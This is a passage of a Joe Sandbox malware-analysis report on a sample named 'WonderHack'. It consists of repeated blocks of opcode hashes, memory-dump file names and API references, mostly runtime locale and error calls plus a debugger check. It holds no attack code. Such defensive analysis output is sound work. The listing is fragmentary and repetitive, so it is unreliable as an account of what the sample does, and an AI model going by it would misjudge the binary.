                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_WonderHack.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: InfoLocale$ErrorLast
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 661929714-0
                                                                                                                                                                                                                                                                          • Opcode ID: cc44a43f33e038db610b7af5945d0504f3760dd396dc4e5ccf04f0c1352c2dbe
                                                                                                                                                                                                                                                                          • Instruction ID: a93d4160d972e2a4f546d9925ece17d0e9ce5c017c7728a878b4b834f9026356
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: cc44a43f33e038db610b7af5945d0504f3760dd396dc4e5ccf04f0c1352c2dbe
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: AF61AE71A102179BDF299F28CC82BEA77ACEF04300F544079ED15CA285EB75DA89DB50
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • IsDebuggerPresent.KERNEL32(?,?,?,?,?,?), ref: 00CAF3A8
                                                                                                                                                                                                                                                                          • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,?), ref: 00CAF3B2
                                                                                                                                                                                                                                                                          • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,?), ref: 00CAF3BF
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1704149721.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1704130855.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1704182770.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1704203677.0000000000CCF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1704224849.0000000000CD0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1704246085.0000000000CD4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1704266387.0000000000CD7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1704306470.0000000000D21000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_WonderHack.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 3906539128-0
                                                                                                                                                                                                                                                                          • Opcode ID: f29bdab456e5d840266ccc848063c293e10b1fb0bac0b9fe071a19fb60c8a955
                                                                                                                                                                                                                                                                          • Instruction ID: bed48f26b066655d503a05492a09afc0a23f7c33e9c49fb09cd83fab69e72a2d
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f29bdab456e5d840266ccc848063c293e10b1fb0bac0b9fe071a19fb60c8a955
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: DD31D4749012299BCB21DF68D889B8CBBB8BF08314F5041EAE41CA7261EB709B858F54
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,00CBCCF2,?,?,00000008,?,?,00CC318B,00000000), ref: 00CBCFC4
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1704149721.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1704130855.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1704182770.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1704203677.0000000000CCF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1704224849.0000000000CD0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1704246085.0000000000CD4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1704266387.0000000000CD7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1704306470.0000000000D21000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_WonderHack.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: ExceptionRaise
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 3997070919-0
                                                                                                                                                                                                                                                                          • Opcode ID: bd163b20675e9f246231e231dd38403dc5d7e84d737cedcc182f1ea7e851a5c6
                                                                                                                                                                                                                                                                          • Instruction ID: 203e40939a0b0c40a3fbdf4deecc8016c5fb9c786fb67eeb575ff858501d9ae0
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: bd163b20675e9f246231e231dd38403dc5d7e84d737cedcc182f1ea7e851a5c6
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 00B14E31510609DFD715CF28C4CABA57BE1FF45364F258698E9AACF2A1C335EA92CB40
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 00CA61AA
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1704149721.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1704130855.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1704182770.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1704203677.0000000000CCF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1704224849.0000000000CD0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1704246085.0000000000CD4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1704266387.0000000000CD7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1704306470.0000000000D21000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_WonderHack.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: FeaturePresentProcessor
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 2325560087-0
                                                                                                                                                                                                                                                                          • Opcode ID: 5e7e5de000277987cf2a9569c90ba022715b27cbd3425c24b5fdc7ac125da0c4
                                                                                                                                                                                                                                                                          • Instruction ID: cd4353e8f06b97fd0efe7771f43c263c13a522b386399f7621359742e4ff8288
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5e7e5de000277987cf2a9569c90ba022715b27cbd3425c24b5fdc7ac125da0c4
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 53A15EB1A067068FDB59CF58D8917ADBBF1FB49328F29862AD415EB350D334A940CF90
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1704149721.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1704130855.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1704182770.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1704203677.0000000000CCF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1704224849.0000000000CD0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1704246085.0000000000CD4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1704266387.0000000000CD7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1704306470.0000000000D21000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_WonderHack.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID: 0
                                                                                                                                                                                                                                                                          • API String ID: 0-4108050209
                                                                                                                                                                                                                                                                          • Opcode ID: d9409afff16be63c33f8bd0a0a282f5813cb2a3c1d29d30e6b13c844ac4f674a
                                                                                                                                                                                                                                                                          • Instruction ID: adedd0f8b5c8c099b2107bd5d78403fc6bb98abdde64bcd3feca01280bda6f79
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d9409afff16be63c33f8bd0a0a282f5813cb2a3c1d29d30e6b13c844ac4f674a
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B5C1BB74A00607CECB24CFA8C9C46BEBBB1EF17318F148619D5A2976A2C731AE45DB51
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                            • Part of subcall function 00CB3413: GetLastError.KERNEL32(00000000,?,00CB5749), ref: 00CB3417
                                                                                                                                                                                                                                                                            • Part of subcall function 00CB3413: SetLastError.KERNEL32(00000000,?,?,00000028,00CAF7C9), ref: 00CB34B9
                                                                                                                                                                                                                                                                          • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00CB89D1
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1704149721.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1704130855.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1704182770.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1704203677.0000000000CCF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1704224849.0000000000CD0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1704246085.0000000000CD4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1704266387.0000000000CD7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1704306470.0000000000D21000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_WonderHack.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: ErrorLast$InfoLocale
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 3736152602-0
                                                                                                                                                                                                                                                                          • Opcode ID: 9b94a5421fafc67bc3118c6865034d78750e4705bd04e4e168ad3a2aeccc3f21
                                                                                                                                                                                                                                                                          • Instruction ID: 9753b15fed18bdb07393f4bea57f13c5369710c942f1f54d20ab208744b12479
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9b94a5421fafc67bc3118c6865034d78750e4705bd04e4e168ad3a2aeccc3f21
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4F218072655646ABDB289A25DC42BFA77ACEF04354F10007AFD06C7241EF74EE48EA50
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1704149721.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1704130855.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1704182770.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1704203677.0000000000CCF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1704224849.0000000000CD0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1704246085.0000000000CD4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1704266387.0000000000CD7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1704306470.0000000000D21000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_WonderHack.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID: 0
                                                                                                                                                                                                                                                                          • API String ID: 0-4108050209
                                                                                                                                                                                                                                                                          • Opcode ID: d676128023a921de9be0a29ae6fce7b82496ef1c00b094a389781c8d89009909
                                                                                                                                                                                                                                                                          • Instruction ID: 05ecac3f3fb589389bfa860be47916e127ba66ee3a0a5a1faf378c49de7da805
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d676128023a921de9be0a29ae6fce7b82496ef1c00b094a389781c8d89009909
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 06B1B17090060B8FCB298FA8C9556BEBBB1AF0731CF144A1ED4A297A91C7319F41DB53
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                            • Part of subcall function 00CB3413: GetLastError.KERNEL32(00000000,?,00CB5749), ref: 00CB3417
                                                                                                                                                                                                                                                                            • Part of subcall function 00CB3413: SetLastError.KERNEL32(00000000,?,?,00000028,00CAF7C9), ref: 00CB34B9
                                                                                                                                                                                                                                                                          • EnumSystemLocalesW.KERNEL32(00CB86CB,00000001,00000000,?,-00000050,?,00CB84BB,00000000,-00000002,00000000,?,00000055,?), ref: 00CB86A2
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1704149721.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1704130855.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1704182770.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1704203677.0000000000CCF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1704224849.0000000000CD0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1704246085.0000000000CD4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1704266387.0000000000CD7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1704306470.0000000000D21000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_WonderHack.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: ErrorLast$EnumLocalesSystem
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 2417226690-0
                                                                                                                                                                                                                                                                          • Opcode ID: 5a9c0875e66c389b71869700378bf748a890c0958c855f8f5b0646c36c729493
                                                                                                                                                                                                                                                                          • Instruction ID: f57fcc653939ad8708f596f4128d262629f0b5ff89fce596c97042430a2b0f83
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5a9c0875e66c389b71869700378bf748a890c0958c855f8f5b0646c36c729493
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E911253A2007019FDB189F39C8916FABB95FF80328F19443CE94787A40E771AA46CB40
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                            • Part of subcall function 00CB3413: GetLastError.KERNEL32(00000000,?,00CB5749), ref: 00CB3417
                                                                                                                                                                                                                                                                            • Part of subcall function 00CB3413: SetLastError.KERNEL32(00000000,?,?,00000028,00CAF7C9), ref: 00CB34B9
                                                                                                                                                                                                                                                                          • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00CB8AF1
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1704149721.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1704130855.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1704182770.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1704203677.0000000000CCF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1704224849.0000000000CD0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1704246085.0000000000CD4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1704266387.0000000000CD7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1704306470.0000000000D21000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_WonderHack.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: ErrorLast$InfoLocale
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 3736152602-0
                                                                                                                                                                                                                                                                          • Opcode ID: fe76e617ea5b47aed5eb9da05873fa0e3be4ed7c666425f555ba951b7898682a
                                                                                                                                                                                                                                                                          • Instruction ID: b429e0ae5279e8094a9bf3b5cda3fe40d4393c007c56586132f0cd7ef4f640ad
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: fe76e617ea5b47aed5eb9da05873fa0e3be4ed7c666425f555ba951b7898682a
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8A11A372611506ABDB149F28DC42AFA7BECEF05310F10407AE506D7281EF74EE04DB90
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                            • Part of subcall function 00CB3413: GetLastError.KERNEL32(00000000,?,00CB5749), ref: 00CB3417
                                                                                                                                                                                                                                                                            • Part of subcall function 00CB3413: SetLastError.KERNEL32(00000000,?,?,00000028,00CAF7C9), ref: 00CB34B9
                                                                                                                                                                                                                                                                          • GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,00CB88E7,00000000,00000000,?), ref: 00CB8C76
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1704149721.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1704130855.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1704182770.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1704203677.0000000000CCF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1704224849.0000000000CD0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1704246085.0000000000CD4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1704266387.0000000000CD7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1704306470.0000000000D21000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_WonderHack.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: ErrorLast$InfoLocale
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 3736152602-0
                                                                                                                                                                                                                                                                          • Opcode ID: 373aca1e78b2cfd96e2c4956ba26ec7723cf797e1274001779b6cc00c5ead3fa
                                                                                                                                                                                                                                                                          • Instruction ID: 72d2ec10c184a4a9b0f0e8bf9f74b8520a6f2f66508da4fdf7cbb77a9eb0b1c2
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 373aca1e78b2cfd96e2c4956ba26ec7723cf797e1274001779b6cc00c5ead3fa
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: BB01D672B00516ABDB285B658806BFA3B6CDB40754F154429EC56A3180EE74EE45D6E0
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                            • Part of subcall function 00CB3413: GetLastError.KERNEL32(00000000,?,00CB5749), ref: 00CB3417
                                                                                                                                                                                                                                                                            • Part of subcall function 00CB3413: SetLastError.KERNEL32(00000000,?,?,00000028,00CAF7C9), ref: 00CB34B9
                                                                                                                                                                                                                                                                          • EnumSystemLocalesW.KERNEL32(00CB897D,00000001,?,?,-00000050,?,00CB8483,-00000050,-00000002,00000000,?,00000055,?,-00000050,?,?), ref: 00CB8968
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1704149721.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1704130855.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1704182770.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1704203677.0000000000CCF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1704224849.0000000000CD0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1704246085.0000000000CD4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1704266387.0000000000CD7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1704306470.0000000000D21000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_WonderHack.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: ErrorLast$EnumLocalesSystem
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 2417226690-0
                                                                                                                                                                                                                                                                          • Opcode ID: 504d6d8006736dc947a035fd792400c343e344e613f99e528e4da1798ab51221
                                                                                                                                                                                                                                                                          • Instruction ID: a91b6854f1b980df4ba4def0a9596079840d98fd959b7cb2e66f89c5627148fd
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 504d6d8006736dc947a035fd792400c343e344e613f99e528e4da1798ab51221
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5AF022366003045FCF245F34AC81ABABB99EF80368F04442DFA424B690CBB29D42D640
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                            • Part of subcall function 00CAF547: EnterCriticalSection.KERNEL32(?,?,00CACD41,00000000,00CCE728,0000000C,00CACCFA,00001000,?,00CB44CA,00001000,?,00CB35B1,00000001,00000364,?), ref: 00CAF556
                                                                                                                                                                                                                                                                          • EnumSystemLocalesW.KERNEL32(00CB439A,00000001,00CCEBA0,0000000C,00CB3DA8,-00000050), ref: 00CB43DF
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1704149721.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1704130855.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1704182770.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1704203677.0000000000CCF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1704224849.0000000000CD0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1704246085.0000000000CD4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1704266387.0000000000CD7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1704306470.0000000000D21000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_WonderHack.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: CriticalEnterEnumLocalesSectionSystem
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 1272433827-0
                                                                                                                                                                                                                                                                          • Opcode ID: 9881f91d4f2fde38af279cf591ac8eab92de5b17aeb0493cec497a3cebcf0354
                                                                                                                                                                                                                                                                          • Instruction ID: e85f39d3cd03f958fe968e6d0d0d5e1c4a2bc7b4840ca0b3cc9daf9b5c5113e6
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9881f91d4f2fde38af279cf591ac8eab92de5b17aeb0493cec497a3cebcf0354
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 57F03232A41205DFDB04EF98E842B9D7BF0EB09725F10416AF511DB2A1DB755940EF90
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                            • Part of subcall function 00CB3413: GetLastError.KERNEL32(00000000,?,00CB5749), ref: 00CB3417
                                                                                                                                                                                                                                                                            • Part of subcall function 00CB3413: SetLastError.KERNEL32(00000000,?,?,00000028,00CAF7C9), ref: 00CB34B9
                                                                                                                                                                                                                                                                          • EnumSystemLocalesW.KERNEL32(00CB8A9D,00000001,?,?,?,00CB84DD,-00000050,-00000002,00000000,?,00000055,?,-00000050,?,?,?), ref: 00CB8A89
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1704149721.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1704130855.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1704182770.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1704203677.0000000000CCF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1704224849.0000000000CD0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1704246085.0000000000CD4000.00000002.00000001.01000000.00000003.sdmpDownload File
